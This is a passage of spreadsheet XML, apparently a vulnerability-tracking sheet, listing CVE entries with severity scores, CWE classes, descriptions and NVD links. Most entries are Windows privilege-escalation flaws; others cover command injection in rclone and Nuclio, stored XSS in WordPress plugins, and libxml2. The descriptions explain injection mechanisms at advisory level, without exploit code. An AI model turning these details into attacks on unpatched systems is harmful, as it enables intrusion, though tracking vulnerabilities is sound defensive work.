      <c r="B1976" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69681</t>
        </is>
      </c>
      <c r="C1976" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1976" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1976" s="5" t="inlineStr"/>
      <c r="F1976" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1976" s="5" t="inlineStr"/>
      <c r="H1976" s="5" t="inlineStr"/>
      <c r="I1976" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1976" s="5" t="inlineStr"/>
      <c r="K1976" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1976" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1976" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69681</t>
        </is>
      </c>
    </row>
    <row r="1977">
      <c r="A1977" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1977" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69689</t>
        </is>
      </c>
      <c r="C1977" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1977" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1977" s="5" t="inlineStr"/>
      <c r="F1977" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1977" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1977" s="5" t="inlineStr"/>
      <c r="I1977" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1977" s="5" t="inlineStr"/>
      <c r="K1977" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-125</t>
        </is>
      </c>
      <c r="L1977" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1977" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69689</t>
        </is>
      </c>
    </row>
    <row r="1978">
      <c r="A1978" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1978" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69714</t>
        </is>
      </c>
      <c r="C1978" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1978" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1978" s="5" t="inlineStr"/>
      <c r="F1978" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1978" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1978" s="5" t="inlineStr"/>
      <c r="I1978" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1978" s="5" t="inlineStr"/>
      <c r="K1978" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1978" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Device Association Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1978" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69714</t>
        </is>
      </c>
    </row>
    <row r="1979">
      <c r="A1979" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1979" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69717</t>
        </is>
      </c>
      <c r="C1979" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1979" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1979" s="5" t="inlineStr"/>
      <c r="F1979" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1979" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1979" s="5" t="inlineStr"/>
      <c r="I1979" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1979" s="5" t="inlineStr"/>
      <c r="K1979" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-822, CWE-843</t>
        </is>
      </c>
      <c r="L1979" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Group Policy allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1979" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69717</t>
        </is>
      </c>
    </row>
    <row r="1980">
      <c r="A1980" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1980" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69727</t>
        </is>
      </c>
      <c r="C1980" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1980" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1980" s="5" t="inlineStr"/>
      <c r="F1980" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1980" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1980" s="5" t="inlineStr"/>
      <c r="I1980" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1980" s="5" t="inlineStr"/>
      <c r="K1980" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1980" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1980" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69727</t>
        </is>
      </c>
    </row>
    <row r="1981">
      <c r="A1981" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1981" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69762</t>
        </is>
      </c>
      <c r="C1981" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1981" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1981" s="5" t="inlineStr"/>
      <c r="F1981" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1981" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1981" s="5" t="inlineStr"/>
      <c r="I1981" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1981" s="5" t="inlineStr"/>
      <c r="K1981" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1981" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1981" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69762</t>
        </is>
      </c>
    </row>
    <row r="1982">
      <c r="A1982" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1982" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69773</t>
        </is>
      </c>
      <c r="C1982" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1982" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1982" s="5" t="inlineStr"/>
      <c r="F1982" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1982" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1982" s="5" t="inlineStr"/>
      <c r="I1982" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1982" s="5" t="inlineStr"/>
      <c r="K1982" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1982" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1982" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69773</t>
        </is>
      </c>
    </row>
    <row r="1983">
      <c r="A1983" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1983" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69777</t>
        </is>
      </c>
      <c r="C1983" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1983" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1983" s="5" t="inlineStr"/>
      <c r="F1983" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1983" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1983" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="I1983" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1983" s="5" t="inlineStr"/>
      <c r="K1983" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1983" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Client allows an authorized attacker to elevate privileges over an adjacent network.</t>
        </is>
      </c>
      <c r="M1983" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69777</t>
        </is>
      </c>
    </row>
    <row r="1984">
      <c r="A1984" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1984" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69807</t>
        </is>
      </c>
      <c r="C1984" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1984" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1984" s="5" t="inlineStr"/>
      <c r="F1984" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="G1984" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1984" s="5" t="inlineStr"/>
      <c r="I1984" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1984" s="5" t="inlineStr"/>
      <c r="K1984" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1984" s="5" t="inlineStr">
        <is>
          <t>Improper limitation of a pathname to a restricted directory ('path traversal') in Windows PowerShell allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1984" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69807</t>
        </is>
      </c>
    </row>
    <row r="1985">
      <c r="A1985" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1985" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69826</t>
        </is>
      </c>
      <c r="C1985" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1985" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1985" s="5" t="inlineStr"/>
      <c r="F1985" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1985" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1985" s="5" t="inlineStr"/>
      <c r="I1985" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1985" s="5" t="inlineStr"/>
      <c r="K1985" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1985" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M1985" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69826</t>
        </is>
      </c>
    </row>
    <row r="1986">
      <c r="A1986" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1986" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69847</t>
        </is>
      </c>
      <c r="C1986" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1986" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1986" s="5" t="inlineStr"/>
      <c r="F1986" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1986" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H198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986" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1986" s="5" t="inlineStr"/>
      <c r="K1986" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1986" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t>
        </is>
      </c>
      <c r="M1986" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69847</t>
        </is>
      </c>
    </row>
    <row r="1987">
      <c r="A1987" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1987" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69875</t>
        </is>
      </c>
      <c r="C1987" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1987" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1987" s="5" t="inlineStr"/>
      <c r="F1987" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1987" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1987" s="5" t="inlineStr"/>
      <c r="I1987" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1987" s="5" t="inlineStr"/>
      <c r="K1987" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-125</t>
        </is>
      </c>
      <c r="L1987" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M1987" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69875</t>
        </is>
      </c>
    </row>
    <row r="1988">
      <c r="A1988" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1988" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69876</t>
        </is>
      </c>
      <c r="C1988" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1988" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1988" s="5" t="inlineStr"/>
      <c r="F1988" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1988" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1988" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I1988" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1988" s="5" t="inlineStr"/>
      <c r="K1988" s="5" t="inlineStr">
        <is>
          <t>CWE-415, CWE-416</t>
        </is>
      </c>
      <c r="L1988" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t>
        </is>
      </c>
      <c r="M1988" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69876</t>
        </is>
      </c>
    </row>
    <row r="1989">
      <c r="A1989" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1989" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71312</t>
        </is>
      </c>
      <c r="C1989" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1989" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1989" s="5" t="inlineStr"/>
      <c r="F1989" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1989" s="5" t="inlineStr"/>
      <c r="H1989" s="5" t="inlineStr"/>
      <c r="I1989" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J1989" s="5" t="inlineStr"/>
      <c r="K1989" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1989" s="5" t="inlineStr">
        <is>
          <t>rclone is a command-line program to sync files and directories to and from different cloud storage providers. Prior to v1.75.0, rclone interpolates remote SFTP paths into PowerShell hash commands in backend/sftp/sftp.go, and quoteOrEscapeShellPath escapes only ASCII apostrophe even though PowerShell treats U+2018, U+2019, U+201A, and U+201B as single-quote delimiters, allowing an attacker-controlled filename to terminate the intended path literal and append PowerShell statements that execute as the victim SSH account when server-side hashing is invoked. This issue is fixed in v1.75.0.</t>
        </is>
      </c>
      <c r="M1989" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71312</t>
        </is>
      </c>
    </row>
    <row r="1990">
      <c r="A1990" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1990" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76139</t>
        </is>
      </c>
      <c r="C1990" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1990" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1990" s="5" t="inlineStr"/>
      <c r="F1990" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1990" s="5" t="inlineStr"/>
      <c r="H1990" s="5" t="inlineStr"/>
      <c r="I1990" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1990" s="5" t="inlineStr"/>
      <c r="K1990" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="L1990" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in acm-operator-bundle. The build process for this component downloads and runs a script from a remote source without verifying its authenticity or integrity. This script gains access to sensitive credentials, such as GitHub access tokens and registry passwords, used in the build environment. A remote attacker could exploit this vulnerability to inject malicious code, leading to unauthorized access to build resources and potential compromise of the resulting operator bundle.</t>
        </is>
      </c>
      <c r="M1990" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76139</t>
        </is>
      </c>
    </row>
    <row r="1991">
      <c r="A1991" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1991" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79755</t>
        </is>
      </c>
      <c r="C1991" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1991" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1991" s="5" t="inlineStr"/>
      <c r="F1991" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1991" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H1991" s="5" t="inlineStr"/>
      <c r="I1991" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J1991" s="5" t="inlineStr"/>
      <c r="K1991" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1991" s="5" t="inlineStr">
        <is>
          <t>Nuclio is a "Serverless" framework for Real-Time Events and Data Processing. Prior to version 1.17.4, on the Nuclio local Docker platform, the function namespace is interpolated—unvalidated—into a double-quoted docker ps --filter "label=nuclio.io/namespace=&lt;value&gt;" command that is executed via the host shell (/bin/sh -c). Because the default auth kind is nop (unauthenticated), a remote attacker can inject arbitrary OS commands that run as root inside the dashboard container, which holds the Docker socket → host compromise. This issue has been patched in version 1.17.4.</t>
        </is>
      </c>
      <c r="M1991" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79755</t>
        </is>
      </c>
    </row>
    <row r="1992">
      <c r="A1992" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1992" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83948</t>
        </is>
      </c>
      <c r="C1992" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1992" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1992" s="5" t="inlineStr"/>
      <c r="F1992" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1992" s="5" t="inlineStr">
        <is>
          <t>microsoft, azure</t>
        </is>
      </c>
      <c r="H1992" s="5" t="inlineStr"/>
      <c r="I1992" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1992" s="5" t="inlineStr"/>
      <c r="K1992" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L1992" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in a command ('command injection') in Microsoft Azure CLI allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1992" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83948</t>
        </is>
      </c>
    </row>
    <row r="1993">
      <c r="A1993" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1993" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84934</t>
        </is>
      </c>
      <c r="C1993" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1993" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1993" s="5" t="inlineStr"/>
      <c r="F1993" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1993" s="5" t="inlineStr"/>
      <c r="H1993" s="5" t="inlineStr"/>
      <c r="I1993" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1993" s="5" t="inlineStr"/>
      <c r="K1993" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1993" s="5" t="inlineStr">
        <is>
          <t>The JCH Optimize WordPress plugin before 6.0.1 does not perform a capability check on one of its authenticated AJAX actions and lets the request choose which internal action runs, allowing any authenticated users such as Subscribers to import arbitrary JCH Optimize WordPress plugin before 6.0.1 settings and store a script that executes in the browser of any visitor or administrator viewing the site.</t>
        </is>
      </c>
      <c r="M1993" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84934</t>
        </is>
      </c>
    </row>
    <row r="1994">
      <c r="A1994" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1994" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84935</t>
        </is>
      </c>
      <c r="C1994" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1994" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1994" s="5" t="inlineStr"/>
      <c r="F1994" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1994" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1994" s="5" t="inlineStr"/>
      <c r="I1994" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1994" s="5" t="inlineStr"/>
      <c r="K1994" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1994" s="5" t="inlineStr">
        <is>
          <t>The HT Menu  WordPress plugin before 1.2.7 does not perform any capability or object-ownership check when saving navigation menu-item settings, and does not escape those stored settings when the menu is rendered, allowing users with minimal permissions such as Subscribers to store JavaScript that executes in the browser of any visitor, administrators included, who views the affected menu.</t>
        </is>
      </c>
      <c r="M1994" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84935</t>
        </is>
      </c>
    </row>
    <row r="1995">
      <c r="A1995" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1995" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86140</t>
        </is>
      </c>
      <c r="C1995" s="5" t="n">
        <v>8</v>
      </c>
      <c r="D1995" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1995" s="5" t="inlineStr"/>
      <c r="F1995" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1995" s="5" t="inlineStr"/>
      <c r="H1995" s="5" t="inlineStr"/>
      <c r="I1995" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1995" s="5" t="inlineStr"/>
      <c r="K1995" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1995" s="5" t="inlineStr">
        <is>
          <t>In libxml2 before 2.15.4, xmlSnprintfElements in valid.c has a strcat stack-based buffer overflow.</t>
        </is>
      </c>
      <c r="M1995" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86140</t>
        </is>
      </c>
    </row>
    <row r="1996">
      <c r="A1996" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1996" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-43133</t>
        </is>
      </c>
      <c r="C1996" s="5" t="n">
        <v>7.9</v>
      </c>
      <c r="D1996" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1996" s="5" t="inlineStr"/>
      <c r="F1996" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1996" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H1996" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I1996" s="5" t="inlineStr">
        <is>
          <t>2026-05-06</t>
        </is>
      </c>
      <c r="J1996" s="5" t="inlineStr"/>
      <c r="K1996" s="5" t="inlineStr">
        <is>
          <t>CWE-628</t>
        </is>
      </c>
      <c r="L1996" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: nSVM: Always use vmcb01 in VMLOAD/VMSAVE emulation
Commit cc3ed80ae69f ("KVM: nSVM: always use vmcb01 to for vmsave/vmload
of guest state") made KVM always use vmcb01 for the fields controlled by
VMSAVE/VMLOAD, but it missed updating the VMLOAD/VMSAVE emulation code
to always use vmcb01.
As a result, if VMSAVE/VMLOAD is executed by an L2 guest and is not
intercepted by L1, KVM will mistakenly use vmcb02. Always use vmcb01
instead of the current VMCB.</t>
        </is>
      </c>
      <c r="M1996" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-43133</t>
        </is>
      </c>
    </row>
    <row r="1997">
      <c r="A1997" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1997" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44629</t>
        </is>
      </c>
      <c r="C1997" s="5" t="n">
        <v>7.9</v>
      </c>
      <c r="D1997" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1997" s="5" t="inlineStr"/>
      <c r="F1997" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1997" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1997" s="5" t="inlineStr"/>
      <c r="I1997" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1997" s="5" t="inlineStr"/>
      <c r="K1997" s="5" t="inlineStr">
        <is>
          <t>CWE-922</t>
        </is>
      </c>
      <c r="L1997" s="5" t="inlineStr">
        <is>
          <t>Improper access control to the Synergis Softwire installation folder. This vulnerability affects Streamvault all-in-one appliances (SV-100E and SV-300E series) and Synergis Softwire installed on Windows servers.</t>
        </is>
      </c>
      <c r="M1997" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44629</t>
        </is>
      </c>
    </row>
    <row r="1998">
      <c r="A1998" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1998" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6726</t>
        </is>
      </c>
      <c r="C1998" s="5" t="n">
        <v>7.9</v>
      </c>
      <c r="D1998" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1998" s="5" t="inlineStr"/>
      <c r="F1998" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1998" s="5" t="inlineStr"/>
      <c r="H1998" s="5" t="inlineStr"/>
      <c r="I1998" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J1998" s="5" t="inlineStr"/>
      <c r="K1998" s="5" t="inlineStr">
        <is>
          <t>CWE-704</t>
        </is>
      </c>
      <c r="L1998" s="5" t="inlineStr">
        <is>
